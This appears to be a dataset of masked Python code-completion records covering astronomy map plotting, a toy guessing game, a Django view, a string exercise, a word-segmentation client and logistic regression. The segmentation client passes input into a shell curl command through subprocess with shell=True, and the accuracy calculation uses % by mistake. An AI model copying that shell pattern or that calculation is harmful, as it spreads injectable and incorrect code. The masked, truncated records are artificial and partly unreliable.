plt.savefig('figs/diff4a.pdf', bbox_inches='tight',pad_inches=0.106)
plt.show()
"""
NX = 4320
NY = 2160
#image_array = resize(LOScloudsN,(NY,NX)) # Resizing image
"""
|
normal
|
{
"blob_id": "d86fd2e6ef5dab4444772192471538842112b3fd",
"index": 2675,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nhp.mollview(fu, title='Full map +50 GLAT', sub=311)\nhp.mollview(se, title='Above threshold (4.0) +50 GLAT', sub=312)\nhp.mollview(ma, title='Diff +50 GLAT', sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight', pad_inches=0.106)\nplt.show()\n<mask token>\n",
"step-3": "<mask token>\nstart = time.time()\npath = '/Users/trygveleithesvalheim/datafiles/'\nNN = 338\nNS = 438\nnside = 512\nnpix = 12 * nside ** 2\nz = np.zeros((1680, 4320))\n<mask token>\nc1 = 420\nc2 = 475\nhdulist = pf.open(path + 'data/cubesCombinedN.fits')\nNfull = hdulist[0].data\nhdulist = pf.open(path + 'data/cubesCombinedS.fits')\nSfull = hdulist[0].data\nfullLOSN = Nfull[c1:c2].sum(axis=0)\nfullLOSS = Sfull[c1:c2].sum(axis=0)\nfullLOSS = np.concatenate((fullLOSS, z), axis=0)\nfullLOSN = np.concatenate((z, fullLOSN), axis=0)\nfull = fullLOSN + fullLOSS\n<mask token>\nhdulist = pf.open(path + 'data/LOScloudsN.fits')\nLOScloudsN = hdulist[0].data\nhdulist = pf.open(path + 'data/LOScloudsS.fits')\nLOScloudsS = hdulist[0].data\nLOScloudsN = LOScloudsN.sum(axis=0)\nLOScloudsS = LOScloudsS.sum(axis=0)\nLOScloudsS = np.concatenate((LOScloudsS, z), axis=0)\nLOScloudsN = np.concatenate((z, LOScloudsN), axis=0)\nimage_array = LOScloudsN + LOScloudsS\n<mask token>\ntheta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]\nphi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])\npix = hp.ang2pix(nside, theta, phi)\n<mask token>\nhealpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nhealpix_map[pix] = image_array\n<mask token>\nfull_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nfull_map[pix] = full\n<mask token>\nle = full_map - healpix_map\nma = le[::-1]\nma[np.where(ma == 0)] = hp.UNSEEN\nfull_map[np.where(full_map == 0)] = hp.UNSEEN\nfu = full_map[::-1]\nhealpix_map[np.where(healpix_map == 0)] = hp.UNSEEN\nse = healpix_map[::-1]\n<mask token>\nhp.mollview(fu, title='Full map +50 GLAT', sub=311)\nhp.mollview(se, title='Above threshold (4.0) +50 GLAT', sub=312)\nhp.mollview(ma, title='Diff +50 GLAT', sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight', pad_inches=0.106)\nplt.show()\n<mask token>\n",
"step-4": "from skimage import data, filters, measure, exposure\nfrom skimage.filters import threshold_mean\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyfits as pf\nimport time\nimport numpy as np\nimport healpy as hp\nfrom healpy.projector import CartesianProj\nfrom healpy.projector import MollweideProj\nstart = time.time()\npath = '/Users/trygveleithesvalheim/datafiles/'\nNN = 338\nNS = 438\nnside = 512\nnpix = 12 * nside ** 2\nz = np.zeros((1680, 4320))\n<mask token>\nc1 = 420\nc2 = 475\nhdulist = pf.open(path + 'data/cubesCombinedN.fits')\nNfull = hdulist[0].data\nhdulist = pf.open(path + 'data/cubesCombinedS.fits')\nSfull = hdulist[0].data\nfullLOSN = Nfull[c1:c2].sum(axis=0)\nfullLOSS = Sfull[c1:c2].sum(axis=0)\nfullLOSS = np.concatenate((fullLOSS, z), axis=0)\nfullLOSN = np.concatenate((z, fullLOSN), axis=0)\nfull = fullLOSN + fullLOSS\n<mask token>\nhdulist = pf.open(path + 'data/LOScloudsN.fits')\nLOScloudsN = hdulist[0].data\nhdulist = pf.open(path + 'data/LOScloudsS.fits')\nLOScloudsS = hdulist[0].data\nLOScloudsN = LOScloudsN.sum(axis=0)\nLOScloudsS = LOScloudsS.sum(axis=0)\nLOScloudsS = np.concatenate((LOScloudsS, z), axis=0)\nLOScloudsN = np.concatenate((z, LOScloudsN), axis=0)\nimage_array = LOScloudsN + LOScloudsS\n<mask token>\ntheta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]\nphi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])\npix = hp.ang2pix(nside, theta, phi)\n<mask token>\nhealpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nhealpix_map[pix] = image_array\n<mask token>\nfull_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\nfull_map[pix] = full\n<mask token>\nle = full_map - healpix_map\nma = le[::-1]\nma[np.where(ma == 0)] = hp.UNSEEN\nfull_map[np.where(full_map == 0)] = hp.UNSEEN\nfu = full_map[::-1]\nhealpix_map[np.where(healpix_map == 0)] = hp.UNSEEN\nse = healpix_map[::-1]\n<mask token>\nhp.mollview(fu, title='Full map +50 GLAT', sub=311)\nhp.mollview(se, title='Above threshold (4.0) +50 GLAT', sub=312)\nhp.mollview(ma, title='Diff +50 GLAT', sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight', pad_inches=0.106)\nplt.show()\n<mask token>\n",
"step-5": "from skimage import data, filters, measure, exposure\nfrom skimage.filters import threshold_mean\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyfits as pf\nimport time\nimport numpy as np\nimport healpy as hp\nfrom healpy.projector import CartesianProj\nfrom healpy.projector import MollweideProj\n# [email protected]\nstart = time.time()\npath = '/Users/trygveleithesvalheim/datafiles/'\n\n\n# MAX SLIDES ON N: 134 (ID:135) and 136 (ID:137)\n# MAX SLIDES ON S: 6 (ID:7)\n# Data: 360 degrees longitude, 50-90 latitude\n# Dimensions: (480,4320)\n# Full map: (2160,4320) need to add 1680\n\nNN = 338 # Identified clouds in N. hemisphere\nNS = 438 # Identified clouds in S. hemisphere\nnside = 512\nnpix = 12*nside**2\nz = np.zeros((1680, 4320)) # Extra array for full sky array\n\n\"\"\"\nfull\n\"\"\"\nc1 = 420\nc2 = 475\nhdulist = pf.open(path+'data/cubesCombinedN.fits')\nNfull = hdulist[0].data\nhdulist = pf.open(path+'data/cubesCombinedS.fits')\nSfull = hdulist[0].data\n\nfullLOSN = Nfull[c1:c2].sum(axis=(0))\nfullLOSS = Sfull[c1:c2].sum(axis=(0))\n\n# Add empty array for converting to full sky\nfullLOSS = np.concatenate((fullLOSS, z), axis=0)\nfullLOSN = np.concatenate((z,fullLOSN), axis=0)\n\nfull = fullLOSN + fullLOSS\n\"\"\"\nAdd full first\n\"\"\"\nhdulist = pf.open(path+'data/LOScloudsN.fits')\nLOScloudsN = hdulist[0].data\nhdulist = pf.open(path+'data/LOScloudsS.fits')\nLOScloudsS = hdulist[0].data\n\n# LOS of all clouds\nLOScloudsN = LOScloudsN.sum(axis=(0))\nLOScloudsS = LOScloudsS.sum(axis=(0))\n\n# Add empty array for converting to full sky\nLOScloudsS = np.concatenate((LOScloudsS, z), axis=0)\nLOScloudsN = np.concatenate((z,LOScloudsN), axis=0)\n\n# Add N and S hemisphere\nimage_array = LOScloudsN+LOScloudsS\n\n\"\"\"\nGENERAL\n\"\"\"\n# Find theta and phi coordinates of image\ntheta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]\nphi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])\n\n# Get pixel positions of full picture\npix = hp.ang2pix(nside, theta, phi)\n\n\"\"\"\nGENERAL END\n\"\"\"\n# Make healpix map array\nhealpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\n\n# put image in healpy map array\nhealpix_map[pix] = image_array # Magic\n#healpix_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN\n\n\"\"\"\nFor full\n\"\"\"\nfull_map = np.zeros(hp.nside2npix(nside), dtype=np.double)\n\nfull_map[pix] = full # Magic\n#full_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN\n\n\"\"\"\nFull end\n\"\"\"\nle = full_map - healpix_map\nma = le[::-1]\nma[np.where(ma == 0)] = hp.UNSEEN\n\nfull_map[np.where(full_map == 0)] = hp.UNSEEN\nfu = full_map[::-1]\nhealpix_map[np.where(healpix_map == 0)] = hp.UNSEEN\nse = healpix_map[::-1]\n\n\"\"\"\nhp.write_map(path+'data/fullHI50.fits',fu, partial=True)\nhp.write_map(path+'data/segmentedHI50.fits',se, partial=True)\nhp.write_map(path+'data/cloudsFITS/subtractedHI50fits',ma, partial=True)\n\"\"\"\n#min = 4.\n#max = 350.\nhp.mollview(fu,title=\"Full map +50 GLAT\",sub=311)\nhp.mollview(se,title=\"Above threshold (4.0) +50 GLAT\", sub = 312)\nhp.mollview(ma,title=\"Diff +50 GLAT\",sub=313)\nplt.savefig('figs/diff4a.pdf', bbox_inches='tight',pad_inches=0.106)\nplt.show()\n\n\"\"\"\nNX = 4320\nNY = 2160\n#image_array = resize(LOScloudsN,(NY,NX)) # Resizing image\n\"\"\"\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# __ __ __ ______ __
# / | / | / | / \ / |
# $$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______
# $$ \/$$// $$ | / \ / \ / \ $$ | $$/ / \ / |/ \ / |
# $$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/
# $$$$ \ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \
# $$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \__/ |$$ \__$$ |$$ |$$ | $$ | $$$$$$ |
#$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/
#$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/
#made with http://patorjk.com/software/taag/
# Xtern Intern Techincal interview
# Josh Martin
# [email protected]
# 2016
import json
import uuid
import random
import time
## Location of file
filename ="data.json"
def newGuess():
# makes new numbers each time alled
return random.randint(0,10)
# init guess
correctGuess = newGuess()
def newUser():
# new init of a user
userid = str(uuid.uuid1())
data={userid:{'coins':0,'guess':0}}
with open(filename,'w') as f:
json.dump(data,f)
return userid
def OpenJson():
# opens the json file satisfied at the top of the document
with open(filename,'r+') as f:
data =json.load(f)
return data
def AddACoin(userid):
# adds a coin to current user
data = OpenJson()
tmp=data[userid]['coins']
tmp+=1
data[userid]['coins']=tmp
JsonFile=open(filename,"w+")
JsonFile.write(json.dumps(data))
JsonFile.close()
def GuessCount(userid):
# keeps track of guess
data = OpenJson()
tmp=data[userid]['guess']
tmp+=1
data[userid]['guess']=tmp
JsonFile=open(filename,"w+")
JsonFile.write(json.dumps(data))
JsonFile.close()
print 'that is {} trys in total.'.format(tmp)
def GetCoins(userid):
# gets current amount of coins
getamount =OpenJson()[userid]['coins']
return getamount
def HandleGuess(userid,guess):
# returns a Boolean value based off if the guess is right or not
print 'the current user, "{}" has guessed: {}'.format(userid,guess)
if guess == correctGuess:
print 'the user,"{}" has guessed correctly and now has {} XternCoins.'.format(userid,(GetCoins(userid)+1))
return True
print 'the user has nt guessed right, please try again.'
return False
def StartGuessing():
user =newUser()
while True:
print("""
__ __ __ ______ __
/ | / | / | / \ / |
$$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______
$$ \/$$// $$ | / \ / \ / \ $$ | $$/ / \ / |/ \ / |
$$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/
$$$$ \ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \
$$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \__/ |$$ \__$$ |$$ |$$ | $$ | $$$$$$ |
$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/
$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/
""") #cheap "gui" to clear the screen a bit and look pretty
print 'the current user, "{}" has {} XternCoins'.format(user,OpenJson()[user]['coins'])
guess =HandleGuess(user,random.randint(0,10))
if guess :
AddACoin(user)
correctGuess=newGuess() # makes a new number to guess
GuessCount(user)
time.sleep(3) # makes program readable to humans not just computers
|
normal
|
{
"blob_id": "ae72d832039f36149988da02d8a4174d80a4ecfb",
"index": 2350,
"step-1": "\n # __ __ __ ______ __\n# / | / | / | / \\ / |\n# $$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______\n# $$ \\/$$// $$ | / \\ / \\ / \\ $$ | $$/ / \\ / |/ \\ / |\n # $$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/\n# $$$$ \\ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \\\n# $$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \\__/ |$$ \\__$$ |$$ |$$ | $$ | $$$$$$ |\n#$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/\n#$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/\n\n#made with http://patorjk.com/software/taag/\n\n# Xtern Intern Techincal interview\n# Josh Martin\n# [email protected]\n# 2016\n\nimport json\nimport uuid\nimport random\nimport time\n\n## Location of file\nfilename =\"data.json\"\n\ndef newGuess():\n # makes new numbers each time alled\n return random.randint(0,10)\n\n# init guess \ncorrectGuess = newGuess()\n\ndef newUser():\n # new init of a user\n userid = str(uuid.uuid1())\n data={userid:{'coins':0,'guess':0}}\n with open(filename,'w') as f:\n json.dump(data,f)\n return userid\ndef OpenJson():\n # opens the json file satisfied at the top of the document\n with open(filename,'r+') as f:\n data =json.load(f)\n return data\n \ndef AddACoin(userid):\n # adds a coin to current user\n data = OpenJson()\n tmp=data[userid]['coins']\n tmp+=1\n data[userid]['coins']=tmp\n JsonFile=open(filename,\"w+\")\n JsonFile.write(json.dumps(data))\n JsonFile.close()\n\ndef GuessCount(userid):\n # keeps track of guess\n data = OpenJson()\n tmp=data[userid]['guess']\n tmp+=1\n data[userid]['guess']=tmp\n JsonFile=open(filename,\"w+\")\n JsonFile.write(json.dumps(data))\n JsonFile.close()\n print 'that is {} trys in total.'.format(tmp)\n\ndef GetCoins(userid):\n # gets current amount of coins\n getamount =OpenJson()[userid]['coins']\n return getamount\n\ndef HandleGuess(userid,guess):\n # returns a Boolean value based off if the guess is right or not\n print 'the current user, \"{}\" has guessed: {}'.format(userid,guess)\n if guess == correctGuess:\n print 'the user,\"{}\" has guessed correctly and now has {} XternCoins.'.format(userid,(GetCoins(userid)+1))\n return True\n print 'the user has nt guessed right, please try again.'\n return False\n \ndef StartGuessing():\n user =newUser()\n while True:\n print(\"\"\" \n \n \n \n \n \n __ __ __ ______ __ \n/ | / | / | / \\ / | \n$$ | $$ |_$$ |_ ______ ______ _______ /$$$$$$ | ______ $$/ _______ _______ \n$$ \\/$$// $$ | / \\ / \\ / \\ $$ | $$/ / \\ / |/ \\ / |\n $$ $$< $$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$ | $$ | /$$$$$$ |$$ |$$$$$$$ |/$$$$$$$/ \n $$$$ \\ $$ | __ $$ $$ |$$ | $$/ $$ | $$ | $$ | __ $$ | $$ |$$ |$$ | $$ |$$ \\ \n $$ /$$ | $$ |/ |$$$$$$$$/ $$ | $$ | $$ | $$ \\__/ |$$ \\__$$ |$$ |$$ | $$ | $$$$$$ |\n$$ | $$ | $$ $$/ $$ |$$ | $$ | $$ | $$ $$/ $$ $$/ $$ |$$ | $$ |/ $$/ \n$$/ $$/ $$$$/ $$$$$$$/ $$/ $$/ $$/ $$$$$$/ $$$$$$/ $$/ $$/ $$/ $$$$$$$/\n \n \n \n \n \n \n \n \n \n \n \"\"\") #cheap \"gui\" to clear the screen a bit and look pretty \n print 'the current user, \"{}\" has {} XternCoins'.format(user,OpenJson()[user]['coins'])\n guess =HandleGuess(user,random.randint(0,10))\n if guess :\n AddACoin(user)\n correctGuess=newGuess() # makes a new number to guess\n GuessCount(user)\n time.sleep(3) # makes program readable to humans not just computers\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.shortcuts import render
from django.views.generic import TemplateView
# Create your views here.
def index(request):
context = 'Welcome home'
return render(request,'base.html',{'context':context})
class HomePageView(TemplateView):
template_name = 'base.html'
|
normal
|
{
"blob_id": "f0a54feaa165a393c4e87cbac2a38347633acf5a",
"index": 1425,
"step-1": "<mask token>\n\n\nclass HomePageView(TemplateView):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-3": "<mask token>\n\n\ndef index(request):\n context = 'Welcome home'\n return render(request, 'base.html', {'context': context})\n\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-4": "from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\n\ndef index(request):\n context = 'Welcome home'\n return render(request, 'base.html', {'context': context})\n\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-5": "from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\n# Create your views here.\ndef index(request):\n context = 'Welcome home'\n return render(request,'base.html',{'context':context})\n\nclass HomePageView(TemplateView):\n template_name = 'base.html'\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
def question():
print("02. 「パトカー」+「タクシー」=「パタトクカシーー」")
print("「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.")
def main():
str1 = "パトカー"
str2 = "タクシー"
print(''.join([x[0] + x[1] for x in zip(str1, str2)]))
if __name__ == '__main__':
question()
main()
|
normal
|
{
"blob_id": "32869a88bb59d47281249b6ebe2357328beb0359",
"index": 3572,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n str1 = 'パトカー'\n str2 = 'タクシー'\n print(''.join([(x[0] + x[1]) for x in zip(str1, str2)]))\n\n\n<mask token>\n",
"step-3": "def question():\n print('02. 「パトカー」+「タクシー」=「パタトクカシーー」')\n print('「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.')\n\n\ndef main():\n str1 = 'パトカー'\n str2 = 'タクシー'\n print(''.join([(x[0] + x[1]) for x in zip(str1, str2)]))\n\n\n<mask token>\n",
"step-4": "def question():\n print('02. 「パトカー」+「タクシー」=「パタトクカシーー」')\n print('「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.')\n\n\ndef main():\n str1 = 'パトカー'\n str2 = 'タクシー'\n print(''.join([(x[0] + x[1]) for x in zip(str1, str2)]))\n\n\nif __name__ == '__main__':\n question()\n main()\n",
"step-5": "#!/usr/bin/env python\n\ndef question():\n print(\"02. 「パトカー」+「タクシー」=「パタトクカシーー」\")\n print(\"「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.\")\n\ndef main():\n str1 = \"パトカー\"\n str2 = \"タクシー\"\n print(''.join([x[0] + x[1] for x in zip(str1, str2)]))\n\nif __name__ == '__main__':\n question()\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import os
import logging
import subprocess
import json
import sys
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(ROOT_PATH)
from src.datafactory.common import json_util
from src.datafactory.config import constant
class SegmentProcess(object):
"""
function for segment
"""
def do_nlp_seg(self, sentence):
"""
connect nlp wordseg
"""
cmd = "curl -d '{\"lang_id\":1,\"lang_para\":0,\"query\":\"%s\"}" \
"' %s?username=%s\&app=%s\&encoding=utf8" % (
sentence,
constant.SEGMENT_URL,
constant.SEGMENT_USERNAME,
constant.SEGMENT_APP
)
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
retn = p.communicate()[0]
except Exception as e:
logging.critical("segment(%s) failed and try again:%s" % (sentence, e))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
retn = p.communicate()[0]
return retn
def deparser(self, segment_result_str):
segment_result = []
try:
segment_result_dict = json.loads(segment_result_str,
object_hook=json_util._decode_dict)
if "scw_out" in segment_result_dict and "wordsepbuf" in segment_result_dict["scw_out"]:
wordsepbuf = segment_result_dict["scw_out"]["wordsepbuf"]
wordsepbuf_split = wordsepbuf.strip("\t").split("\t")
for word in wordsepbuf_split:
segment_result.append(word)
else:
logging.critical("segment result(%s) error without wordsepbuf"
% segment_result_str)
except ValueError as e:
logging.critical("deparser segment result(%s) failed: %s" % (segment_result_str, e))
return segment_result
def get_segment(ori_data):
seg = SegmentProcess()
result = seg.do_nlp_seg(ori_data)
segment_result = seg.deparser(result)
return segment_result
if __name__ == "__main__":
print get_segment("同意 写论文的时候 用百度查一个庭园方面的术语\\\"ll")
|
normal
|
{
"blob_id": "96ea9b2b4d892ac88f7fac9594a6d2ad5d69a7c7",
"index": 7479,
"step-1": "# -*- coding: utf-8 -*-\n\nimport os\nimport logging\nimport subprocess\nimport json\nimport sys\n\nROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(ROOT_PATH)\n\nfrom src.datafactory.common import json_util\nfrom src.datafactory.config import constant\n\n\nclass SegmentProcess(object):\n \"\"\"\n function for segment\n \"\"\"\n\n def do_nlp_seg(self, sentence):\n \"\"\"\n connect nlp wordseg\n \"\"\"\n cmd = \"curl -d '{\\\"lang_id\\\":1,\\\"lang_para\\\":0,\\\"query\\\":\\\"%s\\\"}\" \\\n \"' %s?username=%s\\&app=%s\\&encoding=utf8\" % (\n sentence,\n constant.SEGMENT_URL,\n constant.SEGMENT_USERNAME,\n constant.SEGMENT_APP\n )\n try:\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n retn = p.communicate()[0]\n except Exception as e:\n logging.critical(\"segment(%s) failed and try again:%s\" % (sentence, e))\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n retn = p.communicate()[0]\n\n return retn\n\n def deparser(self, segment_result_str):\n segment_result = []\n try:\n segment_result_dict = json.loads(segment_result_str,\n object_hook=json_util._decode_dict)\n if \"scw_out\" in segment_result_dict and \"wordsepbuf\" in segment_result_dict[\"scw_out\"]:\n wordsepbuf = segment_result_dict[\"scw_out\"][\"wordsepbuf\"]\n wordsepbuf_split = wordsepbuf.strip(\"\\t\").split(\"\\t\")\n for word in wordsepbuf_split:\n\n segment_result.append(word)\n else:\n logging.critical(\"segment result(%s) error without wordsepbuf\"\n % segment_result_str)\n except ValueError as e:\n logging.critical(\"deparser segment result(%s) failed: %s\" % (segment_result_str, e))\n return segment_result\n\n\ndef get_segment(ori_data):\n seg = SegmentProcess()\n result = seg.do_nlp_seg(ori_data)\n segment_result = seg.deparser(result)\n return segment_result\n\n\nif __name__ == \"__main__\":\n print get_segment(\"同意 写论文的时候 用百度查一个庭园方面的术语\\\\\\\"ll\")\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env/ python
# -*- coding:utf-8 -*-
# Created by: Vanish
# Created on: 2019/9/25
import numpy as np
from scipy import optimize
def sigmoid(z):
return 1 / (1 + np.exp(-z))
def costReg(theta, X, y, lamda):
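    # regularized logistic-regression cost: cross-entropy plus an L2 penalty that skips the bias term theta[0]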
theta = np.matrix(theta)
X = np.matrix(X)
y = np.matrix(y)
first = np.multiply(-y, np.log(sigmoid(X * theta.T)))
second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))
reg = (lamda / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))
return np.sum(first - second) / len(X) + reg
def gradientReg(theta, X, y, lamda):
theta = np.matrix(theta)
X = np.matrix(X)
y = np.matrix(y)
parameters = int(theta.ravel().shape[1])
grad = np.zeros(parameters)
error = sigmoid(X * theta.T) - y
for i in range(parameters):
term = np.multiply(error, X[:, i])
if (i == 0):
grad[i] = np.sum(term) / len(X)
else:
grad[i] = (np.sum(term) / len(X)) + ((lamda / len(X)) * theta[:, i])
return grad
def predict(theta, X):
probability = sigmoid(X * theta.T)
return [1 if x >= 0.5 else 0 for x in probability]
def implement_for_LR(X_train, X_test, y_train, y_test,lamda=1):
n = X_train.shape[1]
    # convert to numpy arrays and initialize the parameter array theta
X_train = np.array(X_train.values)
y_train = np.array(y_train.values)
theta = np.zeros(n)
result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg, args=(X_train, y_train, lamda))
theta_min = np.matrix(result[0])
predictions = predict(theta_min, X_test)
correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y_test)]
    accuracy = sum(map(int, correct)) * 100.0 / len(correct)
print('accuracy = {0}%'.format(accuracy))
|
normal
|
{
"blob_id": "991c361043eb1539a80b5e8e1db44bc365e7e639",
"index": 6345,
"step-1": "<mask token>\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-2": "<mask token>\n\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n error = sigmoid(X * theta.T) - y\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n if i == 0:\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = np.sum(term) / len(X) + lamda / len(X) * theta[:, i]\n return grad\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-3": "<mask token>\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\ndef costReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply(1 - y, np.log(1 - sigmoid(X * theta.T)))\n reg = lamda / (2 * len(X)) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2)\n )\n return np.sum(first - second) / len(X) + reg\n\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n error = sigmoid(X * theta.T) - y\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n if i == 0:\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = np.sum(term) / len(X) + lamda / len(X) * theta[:, i]\n return grad\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
